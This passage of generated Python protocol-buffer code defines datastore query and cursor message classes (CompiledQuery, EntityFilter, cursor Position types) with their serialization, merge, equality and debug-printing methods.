    for i in xrange(len(self.prefix_value_)):
      out.putVarInt32(74)
      out.putPrefixedString(self.prefix_value_[i])
    if (self.has_value_prefix_):
      out.putVarInt32(160)
      out.putBoolean(self.value_prefix_)

  def OutputPartial(self, out):
    # Partial form skips the required field when it is unset.
    if (self.has_index_name_):
      out.putVarInt32(66)
      out.putPrefixedString(self.index_name_)
    for i in xrange(len(self.prefix_value_)):
      out.putVarInt32(74)
      out.putPrefixedString(self.prefix_value_[i])
    if (self.has_value_prefix_):
      out.putVarInt32(160)
      out.putBoolean(self.value_prefix_)

  def TryMerge(self, d):
    """Decode fields from `d` until this group's END_GROUP tag (60)."""
    while 1:
      tt = d.getVarInt32()
      if tt == 60: break
      if tt == 66:
        self.set_index_name(d.getPrefixedString())
        continue
      if tt == 74:
        self.add_prefix_value(d.getPrefixedString())
        continue
      if tt == 160:
        self.set_value_prefix(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text (see Query.__str__)."""
    res=""
    if self.has_index_name_: res+=prefix+("index_name: %s\n" % self.DebugFormatString(self.index_name_))
    cnt=0
    for e in self.prefix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("prefix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_value_prefix_: res+=prefix+("value_prefix: %s\n" % self.DebugFormatBool(self.value_prefix_))
    return res

class CompiledQuery_EntityFilter(ProtocolBuffer.ProtocolMessage):
  """Generated message for the EntityFilter group of CompiledQuery.

  Holds an optional distinct flag, kind string, and a lazily-constructed
  ancestor Reference submessage.  Encoded as a group, so TryMerge
  terminates on an END_GROUP tag rather than buffer exhaustion.
  """

  # Class-level defaults; ancestor_ stays None until first accessed.
  has_distinct_ = 0
  distinct_ = 0
  has_kind_ = 0
  kind_ = ""
  has_ancestor_ = 0
  ancestor_ = None

  def __init__(self, contents=None):
    # Guards the lazy creation of the ancestor_ submessage in ancestor().
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def distinct(self): return self.distinct_

  def set_distinct(self, x):
    self.has_distinct_ = 1
    self.distinct_ = x

  def clear_distinct(self):
    if self.has_distinct_:
      self.has_distinct_ = 0
      self.distinct_ = 0

  def has_distinct(self): return self.has_distinct_

  def kind(self): return self.kind_

  def set_kind(self, x):
    self.has_kind_ = 1
    self.kind_ = x

  def clear_kind(self):
    if self.has_kind_:
      self.has_kind_ = 0
      self.kind_ = ""

  def has_kind(self): return self.has_kind_

  def ancestor(self):
    # Lazily build the Reference under the lock; the inner re-check avoids
    # constructing twice when two threads race here.
    if self.ancestor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.ancestor_ is None: self.ancestor_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.ancestor_

  def mutable_ancestor(self): self.has_ancestor_ = 1; return self.ancestor()

  def clear_ancestor(self):

    # Clears contents in place (no deallocation) so existing references stay valid.
    if self.has_ancestor_:
      self.has_ancestor_ = 0;
      if self.ancestor_ is not None: self.ancestor_.Clear()

  def has_ancestor(self): return self.has_ancestor_


  def MergeFrom(self, x):
    """Copy every set field of `x` into self; ancestor is merged recursively."""
    assert x is not self
    if (x.has_distinct()): self.set_distinct(x.distinct())
    if (x.has_kind()): self.set_kind(x.kind())
    if (x.has_ancestor()): self.mutable_ancestor().MergeFrom(x.ancestor())

  def Equals(self, x):
    """Field-by-field equality: presence flags and values must both match."""
    if x is self: return 1
    if self.has_distinct_ != x.has_distinct_: return 0
    if self.has_distinct_ and self.distinct_ != x.distinct_: return 0
    if self.has_kind_ != x.has_kind_: return 0
    if self.has_kind_ and self.kind_ != x.kind_: return 0
    if self.has_ancestor_ != x.has_ancestor_: return 0
    if self.has_ancestor_ and self.ancestor_ != x.ancestor_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields of its own; only the submessage can be uninitialized.
    initialized = 1
    if (self.has_ancestor_ and not self.ancestor_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    """Serialized size in bytes; all tags here encode in 2 bytes."""
    n = 0
    if (self.has_distinct_): n += 2
    if (self.has_kind_): n += 2 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_distinct_): n += 2
    if (self.has_kind_): n += 2 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_distinct()
    self.clear_kind()
    self.clear_ancestor()

  def OutputUnchecked(self, out):
    """Serialize all set fields; tag constants are (field_num << 3) | type."""
    if (self.has_distinct_):
      out.putVarInt32(112)
      out.putBoolean(self.distinct_)
    if (self.has_kind_):
      out.putVarInt32(138)
      out.putPrefixedString(self.kind_)
    if (self.has_ancestor_):
      out.putVarInt32(146)
      out.putVarInt32(self.ancestor_.ByteSize())
      self.ancestor_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_distinct_):
      out.putVarInt32(112)
      out.putBoolean(self.distinct_)
    if (self.has_kind_):
      out.putVarInt32(138)
      out.putPrefixedString(self.kind_)
    if (self.has_ancestor_):
      out.putVarInt32(146)
      out.putVarInt32(self.ancestor_.ByteSizePartial())
      self.ancestor_.OutputPartial(out)

  def TryMerge(self, d):
    """Decode fields from `d` until this group's END_GROUP tag (108)."""
    while 1:
      tt = d.getVarInt32()
      if tt == 108: break
      if tt == 112:
        self.set_distinct(d.getBoolean())
        continue
      if tt == 138:
        self.set_kind(d.getPrefixedString())
        continue
      if tt == 146:
        # Length-delimited submessage: decode through a bounded sub-decoder.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_ancestor().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text (see Query.__str__)."""
    res=""
    if self.has_distinct_: res+=prefix+("distinct: %s\n" % self.DebugFormatBool(self.distinct_))
    if self.has_kind_: res+=prefix+("kind: %s\n" % self.DebugFormatString(self.kind_))
    if self.has_ancestor_:
      res+=prefix+"ancestor <\n"
      res+=self.ancestor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res

class CompiledQuery(ProtocolBuffer.ProtocolMessage):
  """Generated message describing a compiled datastore query plan.

  Fields (numbers per the _TEXT/_TYPES tables at the bottom of the class):
  required group PrimaryScan (1), repeated group MergeJoinScan (7),
  optional message index_def (21), optional int32 offset (10) and
  limit (11), required bool keys_only (12), repeated string
  property_name (24), optional int32 distinct_infix_size (25),
  optional group EntityFilter (13), optional string plan_label (26).
  """
  # Class-level presence flags and scalar defaults; optional sub-messages
  # (index_def_, entityfilter_) start as None and are created lazily.
  has_primaryscan_ = 0
  has_index_def_ = 0
  index_def_ = None
  has_offset_ = 0
  offset_ = 0
  has_limit_ = 0
  limit_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_distinct_infix_size_ = 0
  distinct_infix_size_ = 0
  has_entityfilter_ = 0
  entityfilter_ = None
  has_plan_label_ = 0
  plan_label_ = ""

  def __init__(self, contents=None):
    """Create an empty message; if `contents` is given, parse it as a
    serialized CompiledQuery and merge it in."""
    self.primaryscan_ = CompiledQuery_PrimaryScan()
    self.mergejoinscan_ = []
    self.property_name_ = []
    # Guards lazy construction of index_def_ and entityfilter_.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  # --- primaryscan (required group 1) accessors ---

  def primaryscan(self): return self.primaryscan_

  def mutable_primaryscan(self): self.has_primaryscan_ = 1; return self.primaryscan_

  def clear_primaryscan(self):self.has_primaryscan_ = 0; self.primaryscan_.Clear()

  def has_primaryscan(self): return self.has_primaryscan_

  # --- mergejoinscan (repeated group 7) accessors ---

  def mergejoinscan_size(self): return len(self.mergejoinscan_)
  def mergejoinscan_list(self): return self.mergejoinscan_

  def mergejoinscan(self, i):
    return self.mergejoinscan_[i]

  def mutable_mergejoinscan(self, i):
    return self.mergejoinscan_[i]

  def add_mergejoinscan(self):
    x = CompiledQuery_MergeJoinScan()
    self.mergejoinscan_.append(x)
    return x

  def clear_mergejoinscan(self):
    self.mergejoinscan_ = []
  def index_def(self):
    # Lazily create the optional sub-message under the init lock
    # (double-checked: test, acquire, test again).
    if self.index_def_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.index_def_ is None: self.index_def_ = Index()
      finally:
        self.lazy_init_lock_.release()
    return self.index_def_

  def mutable_index_def(self): self.has_index_def_ = 1; return self.index_def()

  def clear_index_def(self):
    # Keep the allocated sub-message (just Clear it) so later reuse
    # avoids re-allocation.
    if self.has_index_def_:
      self.has_index_def_ = 0;
      if self.index_def_ is not None: self.index_def_.Clear()

  def has_index_def(self): return self.has_index_def_

  # --- offset (optional int32 10) accessors ---

  def offset(self): return self.offset_

  def set_offset(self, x):
    self.has_offset_ = 1
    self.offset_ = x

  def clear_offset(self):
    if self.has_offset_:
      self.has_offset_ = 0
      self.offset_ = 0

  def has_offset(self): return self.has_offset_

  # --- limit (optional int32 11) accessors ---

  def limit(self): return self.limit_

  def set_limit(self, x):
    self.has_limit_ = 1
    self.limit_ = x

  def clear_limit(self):
    if self.has_limit_:
      self.has_limit_ = 0
      self.limit_ = 0

  def has_limit(self): return self.has_limit_

  # --- keys_only (required bool 12) accessors ---

  def keys_only(self): return self.keys_only_

  def set_keys_only(self, x):
    self.has_keys_only_ = 1
    self.keys_only_ = x

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.has_keys_only_ = 0
      self.keys_only_ = 0

  def has_keys_only(self): return self.has_keys_only_

  # --- property_name (repeated string 24) accessors ---

  def property_name_size(self): return len(self.property_name_)
  def property_name_list(self): return self.property_name_

  def property_name(self, i):
    return self.property_name_[i]

  def set_property_name(self, i, x):
    self.property_name_[i] = x

  def add_property_name(self, x):
    self.property_name_.append(x)

  def clear_property_name(self):
    self.property_name_ = []

  # --- distinct_infix_size (optional int32 25) accessors ---

  def distinct_infix_size(self): return self.distinct_infix_size_

  def set_distinct_infix_size(self, x):
    self.has_distinct_infix_size_ = 1
    self.distinct_infix_size_ = x

  def clear_distinct_infix_size(self):
    if self.has_distinct_infix_size_:
      self.has_distinct_infix_size_ = 0
      self.distinct_infix_size_ = 0

  def has_distinct_infix_size(self): return self.has_distinct_infix_size_

  def entityfilter(self):
    # Lazily create the optional EntityFilter group, same double-checked
    # pattern as index_def().
    if self.entityfilter_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.entityfilter_ is None: self.entityfilter_ = CompiledQuery_EntityFilter()
      finally:
        self.lazy_init_lock_.release()
    return self.entityfilter_

  def mutable_entityfilter(self): self.has_entityfilter_ = 1; return self.entityfilter()

  def clear_entityfilter(self):

    if self.has_entityfilter_:
      self.has_entityfilter_ = 0;
      if self.entityfilter_ is not None: self.entityfilter_.Clear()

  def has_entityfilter(self): return self.has_entityfilter_

  # --- plan_label (optional string 26) accessors ---

  def plan_label(self): return self.plan_label_

  def set_plan_label(self, x):
    self.has_plan_label_ = 1
    self.plan_label_ = x

  def clear_plan_label(self):
    if self.has_plan_label_:
      self.has_plan_label_ = 0
      self.plan_label_ = ""

  def has_plan_label(self): return self.has_plan_label_


  def MergeFrom(self, x):
    """Merge every set field of another CompiledQuery `x` into self;
    repeated fields are appended, sub-messages merged recursively."""
    assert x is not self
    if (x.has_primaryscan()): self.mutable_primaryscan().MergeFrom(x.primaryscan())
    for i in xrange(x.mergejoinscan_size()): self.add_mergejoinscan().CopyFrom(x.mergejoinscan(i))
    if (x.has_index_def()): self.mutable_index_def().MergeFrom(x.index_def())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_limit()): self.set_limit(x.limit())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    for i in xrange(x.property_name_size()): self.add_property_name(x.property_name(i))
    if (x.has_distinct_infix_size()): self.set_distinct_infix_size(x.distinct_infix_size())
    if (x.has_entityfilter()): self.mutable_entityfilter().MergeFrom(x.entityfilter())
    if (x.has_plan_label()): self.set_plan_label(x.plan_label())

  def Equals(self, x):
    """Field-by-field equality (presence flags and values); returns 1/0."""
    if x is self: return 1
    if self.has_primaryscan_ != x.has_primaryscan_: return 0
    if self.has_primaryscan_ and self.primaryscan_ != x.primaryscan_: return 0
    if len(self.mergejoinscan_) != len(x.mergejoinscan_): return 0
    for e1, e2 in zip(self.mergejoinscan_, x.mergejoinscan_):
      if e1 != e2: return 0
    if self.has_index_def_ != x.has_index_def_: return 0
    if self.has_index_def_ and self.index_def_ != x.index_def_: return 0
    if self.has_offset_ != x.has_offset_: return 0
    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_limit_ != x.has_limit_: return 0
    if self.has_limit_ and self.limit_ != x.limit_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if len(self.property_name_) != len(x.property_name_): return 0
    for e1, e2 in zip(self.property_name_, x.property_name_):
      if e1 != e2: return 0
    if self.has_distinct_infix_size_ != x.has_distinct_infix_size_: return 0
    if self.has_distinct_infix_size_ and self.distinct_infix_size_ != x.distinct_infix_size_: return 0
    if self.has_entityfilter_ != x.has_entityfilter_: return 0
    if self.has_entityfilter_ and self.entityfilter_ != x.entityfilter_: return 0
    if self.has_plan_label_ != x.has_plan_label_: return 0
    if self.has_plan_label_ and self.plan_label_ != x.plan_label_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff required fields (primaryscan, keys_only) are set and all
    present sub-messages are themselves initialized; optionally append
    human-readable reasons to `debug_strs`."""
    initialized = 1
    if (not self.has_primaryscan_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: primaryscan not set.')
    elif not self.primaryscan_.IsInitialized(debug_strs): initialized = 0
    for p in self.mergejoinscan_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_index_def_ and not self.index_def_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_keys_only_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: keys_only not set.')
    if (self.has_entityfilter_ and not self.entityfilter_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes, assuming required fields are set."""
    n = 0
    n += self.primaryscan_.ByteSize()
    n += 2 * len(self.mergejoinscan_)
    for i in xrange(len(self.mergejoinscan_)): n += self.mergejoinscan_[i].ByteSize()
    if (self.has_index_def_): n += 2 + self.lengthString(self.index_def_.ByteSize())
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    if (self.has_distinct_infix_size_): n += 2 + self.lengthVarInt64(self.distinct_infix_size_)
    if (self.has_entityfilter_): n += 2 + self.entityfilter_.ByteSize()
    if (self.has_plan_label_): n += 2 + self.lengthString(len(self.plan_label_))
    # +4: the two fixed 1-byte group tags for required primaryscan (11/12)
    # plus the 1-byte tag and 1-byte bool for required keys_only (96).
    return n + 4

  def ByteSizePartial(self):
    """Serialized size counting only fields that are actually set."""
    n = 0
    if (self.has_primaryscan_):
      n += 2
      n += self.primaryscan_.ByteSizePartial()
    n += 2 * len(self.mergejoinscan_)
    for i in xrange(len(self.mergejoinscan_)): n += self.mergejoinscan_[i].ByteSizePartial()
    if (self.has_index_def_): n += 2 + self.lengthString(self.index_def_.ByteSizePartial())
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
    if (self.has_keys_only_):
      n += 2
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    if (self.has_distinct_infix_size_): n += 2 + self.lengthVarInt64(self.distinct_infix_size_)
    if (self.has_entityfilter_): n += 2 + self.entityfilter_.ByteSizePartial()
    if (self.has_plan_label_): n += 2 + self.lengthString(len(self.plan_label_))
    return n

  def Clear(self):
    """Reset every field to its default state."""
    self.clear_primaryscan()
    self.clear_mergejoinscan()
    self.clear_index_def()
    self.clear_offset()
    self.clear_limit()
    self.clear_keys_only()
    self.clear_property_name()
    self.clear_distinct_infix_size()
    self.clear_entityfilter()
    self.clear_plan_label()

  def OutputUnchecked(self, out):
    """Serialize to encoder `out` without presence validation.

    Tags: 11/12 group 1 (PrimaryScan), 59/60 group 7 (MergeJoinScan),
    80 field 10 (offset), 88 field 11 (limit), 96 field 12 (keys_only),
    107/108 group 13 (EntityFilter), 170 field 21 (index_def),
    194 field 24 (property_name), 200 field 25 (distinct_infix_size),
    210 field 26 (plan_label).
    """
    out.putVarInt32(11)
    self.primaryscan_.OutputUnchecked(out)
    out.putVarInt32(12)
    for i in xrange(len(self.mergejoinscan_)):
      out.putVarInt32(59)
      self.mergejoinscan_[i].OutputUnchecked(out)
      out.putVarInt32(60)
    if (self.has_offset_):
      out.putVarInt32(80)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(88)
      out.putVarInt32(self.limit_)
    out.putVarInt32(96)
    out.putBoolean(self.keys_only_)
    if (self.has_entityfilter_):
      out.putVarInt32(107)
      self.entityfilter_.OutputUnchecked(out)
      out.putVarInt32(108)
    if (self.has_index_def_):
      out.putVarInt32(170)
      out.putVarInt32(self.index_def_.ByteSize())
      self.index_def_.OutputUnchecked(out)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(194)
      out.putPrefixedString(self.property_name_[i])
    if (self.has_distinct_infix_size_):
      out.putVarInt32(200)
      out.putVarInt32(self.distinct_infix_size_)
    if (self.has_plan_label_):
      out.putVarInt32(210)
      out.putPrefixedString(self.plan_label_)

  def OutputPartial(self, out):
    """Like OutputUnchecked, but skips unset required fields and uses the
    Partial size/serialize variants for nested messages."""
    if (self.has_primaryscan_):
      out.putVarInt32(11)
      self.primaryscan_.OutputPartial(out)
      out.putVarInt32(12)
    for i in xrange(len(self.mergejoinscan_)):
      out.putVarInt32(59)
      self.mergejoinscan_[i].OutputPartial(out)
      out.putVarInt32(60)
    if (self.has_offset_):
      out.putVarInt32(80)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(88)
      out.putVarInt32(self.limit_)
    if (self.has_keys_only_):
      out.putVarInt32(96)
      out.putBoolean(self.keys_only_)
    if (self.has_entityfilter_):
      out.putVarInt32(107)
      self.entityfilter_.OutputPartial(out)
      out.putVarInt32(108)
    if (self.has_index_def_):
      out.putVarInt32(170)
      out.putVarInt32(self.index_def_.ByteSizePartial())
      self.index_def_.OutputPartial(out)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(194)
      out.putPrefixedString(self.property_name_[i])
    if (self.has_distinct_infix_size_):
      out.putVarInt32(200)
      out.putVarInt32(self.distinct_infix_size_)
    if (self.has_plan_label_):
      out.putVarInt32(210)
      out.putPrefixedString(self.plan_label_)

  def TryMerge(self, d):
    """Merge fields decoded from decoder `d` until it is exhausted.

    Group fields (11, 59, 107) recurse until the matching END_GROUP tag;
    length-delimited fields (170) parse from a bounded sub-decoder.
    Unknown tags are skipped; tag 0 signals a corrupt stream.
    """
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 11:
        self.mutable_primaryscan().TryMerge(d)
        continue
      if tt == 59:
        self.add_mergejoinscan().TryMerge(d)
        continue
      if tt == 80:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 88:
        self.set_limit(d.getVarInt32())
        continue
      if tt == 96:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 107:
        self.mutable_entityfilter().TryMerge(d)
        continue
      if tt == 170:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_index_def().TryMerge(tmp)
        continue
      if tt == 194:
        self.add_property_name(d.getPrefixedString())
        continue
      if tt == 200:
        self.set_distinct_infix_size(d.getVarInt32())
        continue
      if tt == 210:
        self.set_plan_label(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Return a human-readable text dump of set fields; repeated elements
    are numbered when `printElemNumber` is truthy."""
    res=""
    if self.has_primaryscan_:
      res+=prefix+"PrimaryScan {\n"
      res+=self.primaryscan_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    cnt=0
    for e in self.mergejoinscan_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("MergeJoinScan%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_index_def_:
      res+=prefix+"index_def <\n"
      res+=self.index_def_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    cnt=0
    for e in self.property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_distinct_infix_size_: res+=prefix+("distinct_infix_size: %s\n" % self.DebugFormatInt32(self.distinct_infix_size_))
    if self.has_entityfilter_:
      res+=prefix+"EntityFilter {\n"
      res+=self.entityfilter_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_plan_label_: res+=prefix+("plan_label: %s\n" % self.DebugFormatString(self.plan_label_))
    return res


  # Executed at class-definition time (not a method) to build the dense
  # tag -> value tuples below from a sparse dict.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants (proto tag numbers, pre-shift).
  kPrimaryScanGroup = 1
  kPrimaryScanindex_name = 2
  kPrimaryScanstart_key = 3
  kPrimaryScanstart_inclusive = 4
  kPrimaryScanend_key = 5
  kPrimaryScanend_inclusive = 6
  kPrimaryScanstart_postfix_value = 22
  kPrimaryScanend_postfix_value = 23
  kPrimaryScanend_unapplied_log_timestamp_us = 19
  kMergeJoinScanGroup = 7
  kMergeJoinScanindex_name = 8
  kMergeJoinScanprefix_value = 9
  kMergeJoinScanvalue_prefix = 20
  kindex_def = 21
  koffset = 10
  klimit = 11
  kkeys_only = 12
  kproperty_name = 24
  kdistinct_infix_size = 25
  kEntityFilterGroup = 13
  kEntityFilterdistinct = 14
  kEntityFilterkind = 17
  kEntityFilterancestor = 18
  kplan_label = 26

  # Field number -> debug name, used by debug formatting.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "PrimaryScan",
    2: "index_name",
    3: "start_key",
    4: "start_inclusive",
    5: "end_key",
    6: "end_inclusive",
    7: "MergeJoinScan",
    8: "index_name",
    9: "prefix_value",
    10: "offset",
    11: "limit",
    12: "keys_only",
    13: "EntityFilter",
    14: "distinct",
    17: "kind",
    18: "ancestor",
    19: "end_unapplied_log_timestamp_us",
    20: "value_prefix",
    21: "index_def",
    22: "start_postfix_value",
    23: "end_postfix_value",
    24: "property_name",
    25: "distinct_infix_size",
    26: "plan_label",
  }, 26)

  # Field number -> wire type, used by the generic skip/decode machinery.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STARTGROUP,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.STARTGROUP,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.NUMERIC,
    13: ProtocolBuffer.Encoder.STARTGROUP,
    14: ProtocolBuffer.Encoder.NUMERIC,
    17: ProtocolBuffer.Encoder.STRING,
    18: ProtocolBuffer.Encoder.STRING,
    19: ProtocolBuffer.Encoder.NUMERIC,
    20: ProtocolBuffer.Encoder.NUMERIC,
    21: ProtocolBuffer.Encoder.STRING,
    22: ProtocolBuffer.Encoder.STRING,
    23: ProtocolBuffer.Encoder.STRING,
    24: ProtocolBuffer.Encoder.STRING,
    25: ProtocolBuffer.Encoder.NUMERIC,
    26: ProtocolBuffer.Encoder.STRING,
  }, 26, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompiledQuery'
class CompiledCursor_PositionIndexValue(ProtocolBuffer.ProtocolMessage):
  """Generated message for one (property, value) pair inside a cursor
  Position's IndexValue group.

  Wire tags: 242 -> field 30 (property, string), 250 -> field 31
  (value, message); the group closes with END_GROUP tag 236 (field 29).
  """
  # Presence flags and defaults; value_ (required) is allocated eagerly
  # in __init__.
  has_property_ = 0
  property_ = ""
  has_value_ = 0

  def __init__(self, contents=None):
    """Create an empty message; if `contents` is given, parse and merge it."""
    self.value_ = PropertyValue()
    if contents is not None: self.MergeFromString(contents)

  # --- property (optional string 30) accessors ---

  def property(self): return self.property_

  def set_property(self, x):
    self.has_property_ = 1
    self.property_ = x

  def clear_property(self):
    if self.has_property_:
      self.has_property_ = 0
      self.property_ = ""

  def has_property(self): return self.has_property_

  # --- value (required message 31) accessors ---

  def value(self): return self.value_

  def mutable_value(self): self.has_value_ = 1; return self.value_

  def clear_value(self):self.has_value_ = 0; self.value_.Clear()

  def has_value(self): return self.has_value_


  def MergeFrom(self, x):
    """Merge every set field of another instance `x` into self."""
    assert x is not self
    if (x.has_property()): self.set_property(x.property())
    if (x.has_value()): self.mutable_value().MergeFrom(x.value())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0."""
    if x is self: return 1
    if self.has_property_ != x.has_property_: return 0
    if self.has_property_ and self.property_ != x.property_: return 0
    if self.has_value_ != x.has_value_: return 0
    if self.has_value_ and self.value_ != x.value_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff required field `value` is set and itself initialized."""
    initialized = 1
    if (not self.has_value_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: value not set.')
    elif not self.value_.IsInitialized(debug_strs): initialized = 0
    return initialized

  def ByteSize(self):
    """Exact serialized size, assuming required fields are set."""
    n = 0
    if (self.has_property_): n += 2 + self.lengthString(len(self.property_))
    n += self.lengthString(self.value_.ByteSize())
    # +2: the fixed 2-byte tag (250) for required `value`.
    return n + 2

  def ByteSizePartial(self):
    """Serialized size counting only fields that are actually set."""
    n = 0
    if (self.has_property_): n += 2 + self.lengthString(len(self.property_))
    if (self.has_value_):
      n += 2
      n += self.lengthString(self.value_.ByteSizePartial())
    return n

  def Clear(self):
    """Reset both fields to defaults."""
    self.clear_property()
    self.clear_value()

  def OutputUnchecked(self, out):
    """Serialize to encoder `out` without presence validation."""
    if (self.has_property_):
      out.putVarInt32(242)
      out.putPrefixedString(self.property_)
    out.putVarInt32(250)
    out.putVarInt32(self.value_.ByteSize())
    self.value_.OutputUnchecked(out)

  def OutputPartial(self, out):
    """Like OutputUnchecked, but skips `value` when unset."""
    if (self.has_property_):
      out.putVarInt32(242)
      out.putPrefixedString(self.property_)
    if (self.has_value_):
      out.putVarInt32(250)
      out.putVarInt32(self.value_.ByteSizePartial())
      self.value_.OutputPartial(out)

  def TryMerge(self, d):
    """Merge fields decoded from `d` until the group's END_GROUP tag (236)."""
    while 1:
      tt = d.getVarInt32()
      if tt == 236: break
      if tt == 242:
        self.set_property(d.getPrefixedString())
        continue
      if tt == 250:
        # Length-delimited sub-message: parse from a bounded sub-decoder.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_value().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Return a human-readable text dump of set fields."""
    res=""
    if self.has_property_: res+=prefix+("property: %s\n" % self.DebugFormatString(self.property_))
    if self.has_value_:
      res+=prefix+"value <\n"
      res+=self.value_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res

class CompiledCursor_Position(ProtocolBuffer.ProtocolMessage):
  """Generated message for a cursor position within an index.

  Wire tags: 218 -> field 27 (start_key, string), 224 -> field 28
  (start_inclusive, bool), 235/236 -> group 29 (IndexValue, repeated),
  258 -> field 32 (key, message), 264 -> field 33 (before_ascending,
  bool); the enclosing Position group closes with END_GROUP tag 20
  (field 2).
  """
  # Presence flags and defaults. Note start_inclusive_ defaults to 1
  # (true); key_ is an optional sub-message created lazily.
  has_start_key_ = 0
  start_key_ = ""
  has_key_ = 0
  key_ = None
  has_start_inclusive_ = 0
  start_inclusive_ = 1
  has_before_ascending_ = 0
  before_ascending_ = 0

  def __init__(self, contents=None):
    """Create an empty message; if `contents` is given, parse and merge it."""
    self.indexvalue_ = []
    # Guards lazy construction of key_.
